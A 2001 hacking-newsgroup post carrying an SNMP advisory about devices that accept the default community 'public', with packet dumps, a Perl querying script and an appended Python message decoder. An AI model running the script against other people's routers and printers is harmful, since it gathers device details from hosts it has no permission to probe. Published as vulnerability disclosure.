ru.nethack- RU.NETHACK -------------------------------------------------------------------
From    : Andrey Sokolov 2:5020/1057.100          04 Apr 2001 01:13:51
To      : All
Subject : A minute of your attention...
--------------------------------------------------------------------------------

The underlings group has decided to finally "surface" and begin "socially useful" activity. At the moment we intend to publish interesting (from our point of view) vulnerabilities we have found, in the form of more or less complete and informative exploits. We intend to publish on Packet Storm and on Bugtraq, in English. If our area of interest turns out to be of interest to the local public (and especially to the esteemed moderator Slava Myasnyankin :))), we will prepare Russian-language versions of these documents at the same time and publish them here. (void.ru? xakep.ru? hackzone.ru?)

I would like to insistently ask the esteemed public once more: do not ask me "where can I get the RFCs?" or "how do I hack Windows, help a beginner" or "give me info on hacking". This is outside the area of interest of my group and of me personally.

=== RFU0001E.TXT ===

          -={[ SNMP supporting network devices vulnerability exploit ]}=-
                                 english edition

-=<( Authors

    VBh     // underlings
    Privacy // underlings

-=<( Authors' requisites

    format   : ASCII, 80 characters per string
    date     : 2001, April 3rd
    feedback : privacy@chat.ru

-=<( Introduction

SNMP (Simple Network Management Protocol) is supported by a huge number of network devices (such as, for example, network printer adapters, routers, etc.). One of the RFC documents that specify the SNMP protocol proclaims approximately the following: "a network device may be considered completely managed if it implements the SNMP protocol". Following the SNMP standard, all the information required to operate a remote network device is kept directly in its memory, in the MIB (Management Information Base). SNMP itself is a user-level interface for controlling a remote MIB.

While performing a remote SNMP request, a "community name" option field is used as an identifier. Let us take a quick look at a typical SNMP request:

    0000: 20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00   SRC..DEST....E.
    0010: 00 4F 39 00 00 00 80 11 CC CC XX XX XX XX YY YY  .O9........"....
    0020: YY YY 04 03 00 A1 00 3B CC CC 30 82 00 2F 02 01  .......;..0../..
    0030: 00 04 06 49 44 45 4E 54 36 A1 82 00 20 02 02 2C  ...IDENT6... ..,
    0040: B0 02 01 00 02 01 00 30 82 00 12 30 82 00 0E 06  .......0...0....
    0050: 0A 2B 06 01 02 01 02 02 01 02 01 05 00           .+...........

Here is the answer to the request above:

    0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00  DEST.. SRC....E.
    0010: 00 5D 01 93 00 00 77 11 CC CC YY YY YY YY XX XX  .]....w..K....."
    0020: XX XX 00 A1 04 03 00 49 CC CC 30 3F 02 01 00 04  .......I.E0?....
    0030: 06 49 44 45 4E 54 36 A2 32 02 02 2C B0 02 01 00  .IDENT6.2..,....
    0040: 02 01 00 30 26 30 24 06 0D 2B 06 01 02 01 02 02  ...0&0$..+......
    0050: 01 02 88 80 80 03 04 13 33 43 6F 6D 20 45 74 68  ........3Com Eth
    0060: 65 72 4C 69 6E 6B 20 50 43 49 00                 erLink PCI.

(To preserve the desired privacy, we fill the IP header's Source and Destination IP address fields with XX.XX.XX.XX and YY.YY.YY.YY respectively; the IP and UDP header checksum fields are filled with CC.CC; the SNMP request's community name field contains the six bytes of a random string, "IDENT6".)

Obviously, we can interact with a remote MIB only if we know the "community name" configured on the remote SNMP agent.

-=<( Vulnerability

It seems that many remote network devices that support the SNMP protocol successfully process a default community name, "public". Here is an SNMP request that contains the string "public" as the community name:

    0000: 20 53 52 43 00 00 44 45 53 54 00 00 08 00 45 00   SRC..DEST....E.
    0010: 00 AD 35 00 00 00 80 11 CC CC XX XX XX XX YY YY  ..5........"....
    0020: YY YY 04 03 00 A1 00 99 CC CC 30 82 00 8D 02 01  ........) 0.....
    0030: 00 04 06 70 75 62 6C 69 63 A0 82 00 7E 02 02 2C  ...public......,
             ^^ - "string" type
                ^^ - string length
                   ^^ ^^ ^^ ^^ ^^ ^^ - community name
    0040: AC 02 01 00 02 01 00 30 82 00 70 30 82 00 0C 06  .......0..p0....
    0050: 08 2B 06 01 02 01 01 01 00 05 00 30 82 00 0C 06  .+.........0....
    0060: 08 2B 06 01 02 01 01 02 00 05 00 30 82 00 0C 06  .+.........0....
    0070: 08 2B 06 01 02 01 01 03 00 05 00 30 82 00 0C 06  .+.........0....
    0080: 08 2B 06 01 02 01 01 04 00 05 00 30 82 00 0C 06  .+.........0....
    0090: 08 2B 06 01 02 01 01 05 00 05 00 30 82 00 0C 06  .+.........0....
    00A0: 08 2B 06 01 02 01 01 06 00 05 00 30 82 00 0C 06  .+.........0....
    00B0: 08 2B 06 01 02 01 02 01 00 05 00                 .+.........

After sending the request above, we receive the following reply:

    0000: 44 45 53 54 00 00 20 53 52 43 00 00 08 00 45 00  DEST.. SRC....E.
    0010: 01 32 01 8F 00 00 77 11 CC CC YY YY YY YY XX XX  .2....w..z....."
    0020: XX XX 00 A1 04 03 01 1E CC CC 30 82 01 12 02 01  .........)0.....
    0030: 00 04 06 70 75 62 6C 69 63 A2 82 01 03 02 02 2C  ...public......,
    0040: AC 02 01 00 02 01 00 30 81 F6 30 81 8A 06 08 2B  .......0..0....+
    0050: 06 01 02 01 01 01 00 04 7E 48 61 72 64 77 61 72  .........Hardwar
    0060: 65 3A 20 78 38 36 20 46 61 6D 69 6C 79 20 36 20  e: x86 Family 6
    0070: 4D 6F 64 65 6C 20 37 20 53 74 65 70 70 69 6E 67  Model 7 Stepping
    0080: 20 33 20 41 54 2F 41 54 20 43 4F 4D 50 41 54 49   3 AT/AT COMPATI
    0090: 42 4C 45 20 2D 20 53 6F 66 74 77 61 72 65 3A 20  BLE - Software:
    00A0: 57 69 6E 64 6F 77 73 20 32 30 30 30 20 56 65 72  Windows 2000 Ver
    00B0: 73 69 6F 6E 20 35 2E 30 20 28 42 75 69 6C 64 20  sion 5.0 (Build
    00C0: 32 31 39 35 20 55 6E 69 70 72 6F 63 65 73 73 6F  2195 Uniprocesso
    00D0: 72 20 46 72 65 65 29 30 18 06 08 2B 06 01 02 01  r Free)0...+....
    00E0: 01 02 00 06 0C 2B 06 01 04 01 82 37 01 01 03 01  .....+.....7....
    00F0: 02 30 0F 06 08 2B 06 01 02 01 01 03 00 43 03 0E  .0...+.......C..
    0100: 43 76 30 0C 06 08 2B 06 01 02 01 01 04 00 04 00  Cv0...+......
    0110: 30 11 06 08 2B 06 01 02 01 01 05 00 04 05 55 4D  0...+.........UM
    0120: 50 52 55 30 0C 06 08 2B 06 01 02 01 01 06 00 04  PRU0...+........
    0130: 00 30 0D 06 08 2B 06 01 02 01 02 01 00 02 01 02  .0...+..........

Here is a small Perl program that queries a remote MIB using "public" as the community name:

-=<( Exploit program

    use IO::Socket;
    use IO::Select;
    use strict;

    print "SNMP analyzer via community name 'public' done by VBh // underlings\n";

    my ($sock, $host, $pkt, $msg, $DSTport, $oid);
    my $community = "public";
    my $MAXLEN    = 1024;
    my $Lport     = 5151;
    my $TIMEOUT   = 3;       # seconds to wait for each reply

    # system group objects 1.3.6.1.2.1.1.1 .. 1.3.6.1.2.1.1.7 (RFC 1213), in order
    my @str = ("sysDescr", "sysObjectID", "sysUpTime", "sysContact",
               "sysName", "sysLocation", "sysServices");

    unless (@ARGV == 2) { die "usage: $0 <host> <port>\n" }
    ($host, $DSTport) = @ARGV;

    for (my $i = 1; $i <= 7; $i++) {
        # OID 1.3.6.1.2.1.1.$i in BER; the trailing .0 instance byte is added below
        $oid = "\x2B\x06\x01\x02\x01\x01" . chr($i);
        # SNMPv1 GetRequest, BER-encoded by hand (all lengths are short form)
        $pkt = "\x30" . chr(length($community) + length($oid) + 25) .
               "\x02\x01\x00" .                         # version: 0 (SNMPv1)
               "\x04\x06" . $community .                # community name
               "\xA0\x19" .                             # GetRequest PDU
               "\x02\x01\x00\x02\x01\x00\x02\x01\x00" . # request-id, error-status, error-index
               "\x30\x0E\x30\x0C" .                     # VarBindList, VarBind
               "\x06" . chr(length($oid) + 1) . $oid . "\x00" .  # object name
               "\x05\x00";                              # NULL value
        $sock = IO::Socket::INET->new(Proto => 'udp', LocalPort => $Lport + $i,
                                      PeerPort => $DSTport, PeerAddr => $host)
            || die "Creating socket: $!\n";
        $sock->send($pkt) || die "send: $!";
        # wait at most $TIMEOUT seconds instead of blocking forever on a silent host
        if (IO::Select->new($sock)->can_read($TIMEOUT)
            && defined($sock->recv($msg, $MAXLEN))) {
            # the value starts at byte 40 only while every length in the reply is short form
            print "$host $str[$i-1]: " . unpack("x40 A*", $msg) . "\r\n";
        } else {
            print "$host $str[$i-1]: no reply\r\n";
        }
        close($sock);
    }

-=<( Statistics

It was not our purpose to collect extensive statistics on this vulnerability. Here is a short list of remote systems on which we have already tested it:

    - 3Com routers (SuperStack II), various 3Com network adapters
    - Cisco routers
    - Templex routers
    - Hewlett Packard network printers
    - Xerox network printers

We suppose that, with some persistence, this list may be greatly expanded.

-=<( Destructive possibility

Besides all that is said above, there are some network devices that allow records to be written into their MIBs. All the tests we performed on the whole range of Hewlett Packard network printers confirmed this supposition. For understandable reasons, we will not publish an exploit program that implements this destructive possibility.

-=<( Additional information

Basic RFC documents that specify the SNMP and MIB-II concepts:

    1) 1157, "A Simple Network Management Protocol (SNMP)". You may easily find a sufficient amount of information on SNMP protocol programming there.
    2) 1213, "Management Information Base for Network Management of TCP/IP-based internets: MIB-II"

Additional RFCs:

    3) 1067, 1098, 1158, 1161, 1212, 1239, 1303, 1351, 1352, 1354, 1441, 1442, 1443, 1444, 1445, 1446, 1447, 1448, 1449, 1450, 1573, 1901, 1902, 1903, 1904, 1905, 1906, 1907, 1908, 1909, 1910, 2011, 2012, 2013

It may also be worthwhile to look at the documentation and programs of native SNMP agents and managers.

=== RFU0001E.TXT ===

Cheers, [Privacy], _/daedalus@inbox.ru_/ [_underlings_]

--- 
 * Origin: Originated by 3BEPb (2:5020/1057.100)
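The messages in the dumps above are BER-encoded, and the Perl program's fixed `unpack("x40 A*")` offset only holds while every length byte in the reply is short form, which the "public" reply (`30 82 01 12 ...`) already breaks. The decoder below is an added example, not the advisory's code: it walks the TLV structure of an SNMPv1 message, decodes community name, PDU type and variable bindings (including multi-byte OID sub-identifiers such as the ifDescr index in the first reply), and is fed the "IDENT6" GetResponse copied from the dump above, so a defender can check captured SNMP traffic for the default community name rather than trusting a fixed offset.

```python
# Added example (not the advisory's code): minimal SNMPv1 (RFC 1157) BER decoder.
PDU_TYPES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}

def read_tlv(buf, pos):
    """Return (tag, contents, next_pos) for the BER TLV starting at buf[pos]."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: 81 nn, 82 nn nn, ...
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(raw):
    """First byte packs two arcs (40*x + y); the rest are base-128 sub-ids."""
    arcs, val = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:                    # high bit clear ends this sub-id
            arcs, val = arcs + [val], 0
    return ".".join(map(str, arcs))

def decode_value(tag, raw):
    if tag in (0x02, 0x41, 0x42, 0x43):     # INTEGER, Counter, Gauge, TimeTicks
        return int.from_bytes(raw, "big", signed=tag == 0x02)
    if tag == 0x04:                         # OCTET STRING, kept as sent (NUL too)
        return raw.decode("latin-1")
    return decode_oid(raw) if tag == 0x06 else raw.hex()   # OID; NULL/other: hex

def parse_snmp(buf):
    """Parse one SNMPv1 message: version, community, PDU type and bindings."""
    _, msg, _ = read_tlv(buf, 0)            # outer SEQUENCE
    _, version, pos = read_tlv(msg, 0)
    _, community, pos = read_tlv(msg, pos)
    pdu_tag, pdu, _ = read_tlv(msg, pos)
    _, req_id, pos = read_tlv(pdu, 0)
    pos = read_tlv(pdu, read_tlv(pdu, pos)[2])[2]   # skip error-status, error-index
    _, vbl, _ = read_tlv(pdu, pos)
    bindings, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = read_tlv(vbl, pos)
        _, oid, p = read_tlv(vb, 0)
        vtag, val, _ = read_tlv(vb, p)
        bindings.append((decode_oid(oid), decode_value(vtag, val)))
    return {"version": version[0], "community": community.decode("latin-1"),
            "pdu": PDU_TYPES.get(pdu_tag, hex(pdu_tag)),
            "request_id": int.from_bytes(req_id, "big"), "bindings": bindings}
# GetResponse dump above, UDP payload (from offset 0x2A), community "IDENT6".
RESPONSE = bytes.fromhex(
    "303f020100040649 44454e5436a23202 022cb00201000201 0030263024060d2b"
    "0601020102020102 8880800304133343 6f6d204574686572 4c696e6b20504349 00")
```

Applied to the "public" GetRequest above, the same parser reports community "public", a GetRequest PDU and seven bindings, the first six under 1.3.6.1.2.1.1 (the system group) and the last one 1.3.6.1.2.1.2.1.0 (ifNumber).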